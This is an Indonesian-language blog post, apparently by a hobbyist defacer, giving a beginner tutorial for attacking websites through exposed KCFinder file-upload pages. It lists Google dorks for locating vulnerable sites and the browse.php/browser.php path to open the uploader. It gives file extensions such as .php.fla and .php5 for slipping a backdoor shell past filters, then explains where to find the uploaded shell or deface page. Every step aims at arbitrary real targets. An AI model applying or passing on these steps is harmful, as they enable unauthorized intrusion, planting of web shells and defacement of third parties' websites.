[Deface Poc Kcfinder+Up Shell]
Assalamu'alaikum,hae selamat pagi,siang,sore,malam :v kembali lagi dengan gw yak bangsat mimin gans>//< Andika pratamak.ali ini gua akan share Tutorial Kcfinder upshell eak :v ,ya mungkin dah banyak yang tau tapi tak apa apa :v wokwok
Poc jadul + murahan mungkin ya tapi cocok buat pemula2 kaya saya Mastah mastah ?? Minggir dulu dah okeh lngsng ajah :
Bahan:
Dork:
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload/
/panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/file
Sisa nya Use Your Brain Yak kampank :v
script depes kesayangan kalean :v
Shell beckdor :v ext .php.fla ,.php6, .php3 ,php5 eak;v
Exploit :
/browser.php
ok daripada banyak bacod langsung sadja ok :V
1.Langkah pertama sarching dork diatas di om google dengan browser Kesayangan kalian :v
2.Pilih satu website yg di taksir dan masukin exploitnya diblakang /kcfinder/
Contoh :
Site.co.li/Blablabla/kcfinder/browser.php
jika sudah maka akan ada tempat upload 🙂
4.Maka tinggal kalian upload shell backdoor kalian
klo gagal upload script deface kalean aja yak :c
kalo gagal lagi gimana bang,MATI AJA :V ga lah w becanda :v ya cari target laen eak dek :*
5. Selanjutnya jika sudah terupload dan sukses , tinggal kita akses shell kita , caranyahapus/browser.php
Contoh:
Site.co.li/blablabla/kcfinder/browser.php
Menjadi :
Site co.li/blablabla/kcfinder/
:V nah ada file kalean kan :V klo ga ada di folder ini ya
Upload/ – lalu klik folder-files/ – yang ada disituh dan cari shell backdoor yg tadi kalian upload difolder tersebut .
Atau bisa kalian tambahkan exploit sperti ini di
Belakang /kcfinder/ ,
Contoh :Site.co.li/blablabla/kcfinder/upload/files/shellkalian.php.fla
Site co.li/blablabla/kcfinder/upload/files/scriptkalian.html
Udah cuma itu ajah . Gampang kan ?? Kuncinya si usaha dan kesabaran , karna mencari website vuln itu gak segampang mengedipkan mata selamat mencoba mastah
Oke sekian dari mimin gans>//< wassalamu'alaikum

Komentar
Posting Komentar